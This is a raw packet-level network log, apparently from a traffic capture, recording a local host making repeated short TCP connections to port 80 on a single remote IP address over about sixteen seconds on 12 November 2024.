                                                                                                            Nov 12, 2024 00:43:50.727087975 CET805012437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:50.727158070 CET5012480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:50.729695082 CET805012537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:50.729759932 CET5012580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:50.729865074 CET5012580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:50.734746933 CET805012537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:51.088709116 CET5012580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:51.095158100 CET805012537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:51.095175028 CET805012537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:51.095184088 CET805012537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:51.313759089 CET805012537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:51.369848013 CET5012580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:51.389118910 CET805012537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:51.545054913 CET5012580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:51.732001066 CET5012580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:51.732820034 CET5012680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:51.738607883 CET805012537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:51.738652945 CET5012580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:51.739361048 CET805012637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:51.739432096 CET5012680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:51.739566088 CET5012680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:51.746005058 CET805012637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:52.088771105 CET5012680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:52.095469952 CET805012637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:52.095487118 CET805012637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:52.095499992 CET805012637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:52.325294018 CET805012637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:52.404751062 CET805012637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:52.404803991 CET5012680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:52.550329924 CET5012680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:52.550612926 CET5012780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:52.557198048 CET805012637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:52.557301998 CET5012680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:52.557334900 CET805012737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:52.557403088 CET5012780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:52.557544947 CET5012780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:52.564049959 CET805012737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:52.916996956 CET5012780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:52.921899080 CET805012737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:52.921983004 CET805012737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:52.921993017 CET805012737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:53.143841982 CET805012737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:53.220634937 CET805012737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:53.220716953 CET5012780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:53.335612059 CET5012780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:53.336925983 CET5012880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:53.340966940 CET805012737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:53.341037035 CET5012780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:53.341804028 CET805012837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:53.341867924 CET5012880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:53.341979980 CET5012880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:53.346950054 CET805012837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:53.512053967 CET5012980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:53.512418985 CET5012880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:53.621356010 CET805012937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:53.621427059 CET5012980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:53.621718884 CET5012980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:53.626661062 CET805012937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:53.665103912 CET805012837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:53.700752974 CET5013080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:53.705712080 CET805013037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:53.705784082 CET5013080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:53.705888033 CET5013080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:53.710973024 CET805013037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:53.748925924 CET805012837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:53.749000072 CET5012880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:53.982417107 CET5012980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:53.987529039 CET805012937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:53.987593889 CET805012937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:54.058872938 CET5013080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:54.063867092 CET805013037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:54.063879013 CET805013037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:54.063889980 CET805013037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:54.205719948 CET805012937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:54.281959057 CET805012937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:54.283798933 CET5012980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:54.289213896 CET805013037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:54.354249001 CET5013080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:54.365844965 CET805013037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:54.490760088 CET5012980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:54.491065025 CET5013080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:54.491401911 CET5013180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:54.498338938 CET805012937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:54.498507977 CET805013137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:54.498619080 CET5012980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:54.498619080 CET5013180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:54.498725891 CET5013180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:54.498733997 CET805013037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:54.498774052 CET5013080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:54.507232904 CET805013137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:54.854325056 CET5013180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:54.859112024 CET805013137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:54.859244108 CET805013137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:54.859253883 CET805013137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:55.066576004 CET805013137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:55.143735886 CET805013137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:55.143876076 CET5013180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:55.285675049 CET5013280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:55.290563107 CET805013237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:55.290633917 CET5013280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:55.290868044 CET5013280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:55.295746088 CET805013237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:55.636113882 CET5013280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:55.641047955 CET805013237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:55.641120911 CET805013237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:55.641335964 CET805013237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:55.881203890 CET805013237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:55.954498053 CET805013237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:55.954566956 CET5013280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:56.069972992 CET5013280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:56.070430994 CET5013380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:56.075417995 CET805013337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:56.075608969 CET805013237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:56.075702906 CET5013280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:56.075789928 CET5013380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:56.075836897 CET5013380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:56.080676079 CET805013337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:56.433320045 CET5013380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:56.807518005 CET5013380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:57.313374996 CET805013337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:57.314399958 CET805013337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:57.314455032 CET5013380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:57.315325975 CET805013337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:57.315366983 CET5013380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:57.317054987 CET805013337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:57.317109108 CET5013380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:57.317744017 CET805013337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:57.317881107 CET805013337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:57.317892075 CET805013337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:57.319215059 CET805013337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:57.322118998 CET805013337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:57.322129965 CET805013337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:57.558734894 CET805013337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:57.681958914 CET5013380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:57.688941002 CET805013337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:57.689043999 CET5013380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:57.699805021 CET5013480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:57.706238031 CET805013437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:57.706346989 CET5013480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:57.706549883 CET5013480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:57.712836981 CET805013437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:58.057652950 CET5013480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:58.064131975 CET805013437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:58.064146042 CET805013437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:58.064157009 CET805013437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:58.291938066 CET805013437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:58.377825022 CET805013437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:58.377901077 CET5013480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:58.491183043 CET5013480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:58.491825104 CET5013580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:58.496567011 CET805013437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:58.496676922 CET805013537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:58.496759892 CET5013480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:58.496793985 CET5013580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:58.496963978 CET5013580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:58.503523111 CET805013537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:58.854425907 CET5013580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:58.859322071 CET805013537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:58.859435081 CET805013537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:58.859452009 CET805013537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:59.082463026 CET805013537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:59.135520935 CET5013580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:59.166461945 CET805013537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:59.222294092 CET5013580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:59.293085098 CET5013580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:59.293389082 CET5013680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:59.298316956 CET805013537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:59.298398018 CET5013580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:59.298810959 CET805013637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:59.298882008 CET5013680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:59.360807896 CET5013680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:59.365689993 CET805013637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:59.693191051 CET5013780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:59.694698095 CET5013680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:59.698219061 CET805013737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:59.698297024 CET5013780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:59.698406935 CET5013780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:59.703104019 CET805013737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:59.715692997 CET805013637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:59.715742111 CET5013680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:00.057513952 CET5013780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:00.062490940 CET805013737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:00.062515020 CET805013737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:00.062525034 CET805013737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:00.263124943 CET805013737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:00.307411909 CET5013780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:00.341254950 CET805013737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:00.385530949 CET5013780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:00.463500977 CET5013780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:00.464859962 CET5013880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:00.468684912 CET805013737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:00.468894005 CET5013780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:00.469690084 CET805013837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:00.469750881 CET5013880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:00.469882965 CET5013880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:00.474651098 CET805013837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:00.823219061 CET5013880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:00.828207970 CET805013837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:00.828221083 CET805013837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:00.828229904 CET805013837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:01.035492897 CET805013837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:01.088673115 CET5013880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:01.109524012 CET805013837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:01.151237011 CET5013880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:01.226897001 CET5013880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:01.227536917 CET5013980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:01.232129097 CET805013837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:01.232604980 CET805013937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:01.232703924 CET5013880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:01.232707024 CET5013980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:01.232819080 CET5013980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:01.237952948 CET805013937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:01.589148998 CET5013980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:01.594147921 CET805013937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:01.594161034 CET805013937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:01.594172955 CET805013937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:01.815957069 CET805013937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:01.891743898 CET805013937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:01.893409014 CET5013980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:02.157192945 CET5014080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:02.162054062 CET805014037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:02.162121058 CET5014080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:02.164490938 CET5014080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:02.169270039 CET805014037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:02.510689020 CET5014080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:02.517680883 CET805014037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:02.517698050 CET805014037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:02.517709017 CET805014037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:02.745313883 CET805014037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:02.791809082 CET5014080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:02.826277018 CET805014037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:02.869977951 CET5014080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:02.993447065 CET5014080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:03.000354052 CET805014037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:03.000431061 CET5014080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:03.016518116 CET5014180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:03.023363113 CET805014137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:03.023438931 CET5014180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:03.023514986 CET5014180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:03.030574083 CET805014137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:03.370104074 CET5014180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:03.377650023 CET805014137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:03.377672911 CET805014137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:03.377682924 CET805014137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:03.591658115 CET805014137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:03.641412020 CET5014180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:03.673135042 CET805014137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:03.792325974 CET5014180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:03.792846918 CET5014280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:03.799792051 CET805014137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:03.799849987 CET5014180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:03.800153971 CET805014237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:03.800220013 CET5014280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:03.800299883 CET5014280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:03.806646109 CET805014237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:04.151319981 CET5014280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:04.157954931 CET805014237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:04.157973051 CET805014237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:04.158018112 CET805014237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:04.367026091 CET805014237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:04.448782921 CET805014237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:04.448842049 CET5014280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:04.570815086 CET5014280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:04.571372032 CET5014380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:04.577738047 CET805014237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:04.577820063 CET805014337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:04.577852011 CET5014280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:04.577898979 CET5014380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:04.578011036 CET5014380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:04.584462881 CET805014337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:04.705360889 CET5014480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:04.707453012 CET5014380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:04.712481022 CET805014437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:04.712552071 CET5014480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:04.712662935 CET5014480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:04.719189882 CET805014437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:04.757065058 CET805014337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:04.859179020 CET5014580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:04.865293980 CET805014537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:04.869853973 CET5014580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:04.869956017 CET5014580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:04.874731064 CET805014537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:04.987154007 CET805014337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:04.989840031 CET5014380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:05.057579041 CET5014480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:05.062442064 CET805014437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:05.062525988 CET805014437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:05.229383945 CET5014580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:05.235848904 CET805014537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:05.235860109 CET805014537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:05.235872030 CET805014537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:05.279916048 CET805014437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:05.353663921 CET805014437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:05.353738070 CET5014480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:05.435323000 CET805014537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:05.494991064 CET5014580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:05.671345949 CET805014537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:05.671360970 CET805014537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:05.671432018 CET5014580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:05.788227081 CET5014480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:05.788278103 CET5014580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:05.789381027 CET5014680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:05.793879032 CET805014437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:05.794383049 CET805014537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:05.794447899 CET5014480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:05.794492006 CET5014580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:05.794522047 CET805014637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:05.797852039 CET5014680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:05.798001051 CET5014680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:05.802956104 CET805014637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:06.151338100 CET5014680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:06.156405926 CET805014637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:06.156419039 CET805014637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:06.156429052 CET805014637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:06.381900072 CET805014637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:06.454222918 CET805014637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:06.457654953 CET5014680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:06.587126017 CET5014680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:06.587759972 CET5014780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:06.593959093 CET805014637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:06.594197035 CET805014737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:06.594276905 CET5014680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:06.594316959 CET5014780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:06.594415903 CET5014780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:06.599405050 CET805014737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:06.948199987 CET5014780192.168.2.437.44.238.250
